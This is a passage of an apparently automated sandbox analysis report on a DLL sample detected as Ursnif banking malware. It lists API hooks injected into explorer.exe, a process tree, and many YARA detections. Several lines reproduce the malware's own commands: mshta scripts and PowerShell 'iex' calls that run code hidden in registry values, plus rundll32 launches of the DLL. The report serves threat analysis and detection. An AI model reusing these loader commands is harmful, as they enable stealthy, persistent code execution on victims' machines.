                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function NameHook TypeActive in Processes
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                          CreateProcessAsUserWEATexplorer.exe
                                                          CreateProcessAsUserWINLINEexplorer.exe
                                                          CreateProcessWEATexplorer.exe
                                                          CreateProcessWINLINEexplorer.exe
                                                          CreateProcessAEATexplorer.exe
                                                          CreateProcessAINLINEexplorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: user32.dll
                                                          Function NameHook TypeNew Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6BEF6FC
                                                          Process: explorer.exe, Module: KERNEL32.DLL
                                                          Function NameHook TypeNew Data
                                                          CreateProcessAsUserWEAT7FFABB03521C
                                                          CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessWEAT7FFABB035200
                                                          CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessAEAT7FFABB03520E
                                                          CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          Process: explorer.exe, Module: WININET.dll
                                                          Function NameHook TypeNew Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6BEF6FC

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: loaddll32.exe PID: 6856 Parent PID: 6416

                                                          General

                                                          Start time:01:30:58
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\loaddll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\data.dll'
                                                          Imagebase:0xc70000
                                                          File size:893440 bytes
                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:moderate

                                                          Analysis Process: cmd.exe PID: 484 Parent PID: 6856

                                                          General

                                                          Start time:01:30:59
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Analysis Process: rundll32.exe PID: 6616 Parent PID: 6856

                                                          General

                                                          Start time:01:30:59
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Analysis Process: rundll32.exe PID: 1848 Parent PID: 484

                                                          General

                                                          Start time:01:30:59
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Analysis Process: rundll32.exe PID: 4500 Parent PID: 6856

                                                          General

                                                          Start time:01:31:03
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\data.dll,Father
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Analysis Process: rundll32.exe PID: 1444 Parent PID: 6856

                                                          General

                                                          Start time:01:31:07
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Analysis Process: mshta.exe PID: 4812 Parent PID: 3424

                                                          General

                                                          Start time:01:32:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                          Imagebase:0x7ff7884e0000
                                                          File size:14848 bytes
                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Analysis Process: mshta.exe PID: 6692 Parent PID: 3424

                                                          General

                                                          Start time:01:32:27
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                          Imagebase:0x7ff7884e0000
                                                          File size:14848 bytes
                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Analysis Process: powershell.exe PID: 4588 Parent PID: 4812

                                                          General

                                                          Start time:01:32:27
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                          Imagebase:0x7ff7bedd0000
                                                          File size:447488 bytes
                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Analysis Process: conhost.exe PID: 1568 Parent PID: 4588

                                                          General

                                                          Start time:01:32:28
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Analysis Process: powershell.exe PID: 3740 Parent PID: 6692

                                                          General

                                                          Start time:01:32:29
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                          Imagebase:0x7ff7bedd0000
                                                          File size:447488 bytes
                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Analysis Process: conhost.exe PID: 2812 Parent PID: 3740

                                                          General

                                                          Start time:01:32:29
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Analysis Process: csc.exe PID: 6836 Parent PID: 4588

                                                          General

                                                          Start time:01:32:34
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Analysis Process: csc.exe PID: 7024 Parent PID: 3740

                                                          General

                                                          Start time:01:32:34
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Analysis Process: cvtres.exe PID: 6316 Parent PID: 6836

                                                          General

                                                          Start time:01:32:35
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cvtres.exe PID: 4504 Parent PID: 7024

                                                          General

                                                          Start time:01:32:35
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: csc.exe PID: 5528 Parent PID: 4588

                                                          General

                                                          Start time:01:32:37
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Analysis Process: csc.exe PID: 2088 Parent PID: 3740

                                                          General

                                                          Start time:01:32:37
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Analysis Process: cvtres.exe PID: 6200 Parent PID: 5528

                                                          General

                                                          Start time:01:32:38
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cvtres.exe PID: 6248 Parent PID: 2088

                                                          General

                                                          Start time:01:32:39
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 4588

                                                          General

                                                          Start time:01:32:44
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff6fee60000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, Author: Joe Security

                                                          Analysis Process: control.exe PID: 6988 Parent PID: 6856

                                                          General

                                                          Start time:01:32:47
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\control.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\control.exe -h
                                                          Imagebase:0x7ff7880b0000
                                                          File size:117760 bytes
                                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: rundll32.exe PID: 3980 Parent PID: 6988

                                                          General

                                                          Start time:01:32:51
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff66d750000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: control.exe PID: 4868 Parent PID: 1848

                                                          General

                                                          Start time:01:32:51
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\control.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\control.exe -h
                                                          Imagebase:0x7ff7880b0000
                                                          File size:117760 bytes
                                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security

                                                          Analysis Process: RuntimeBroker.exe PID: 3656 Parent PID: 3424

                                                          General

                                                          Start time:01:33:07
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security
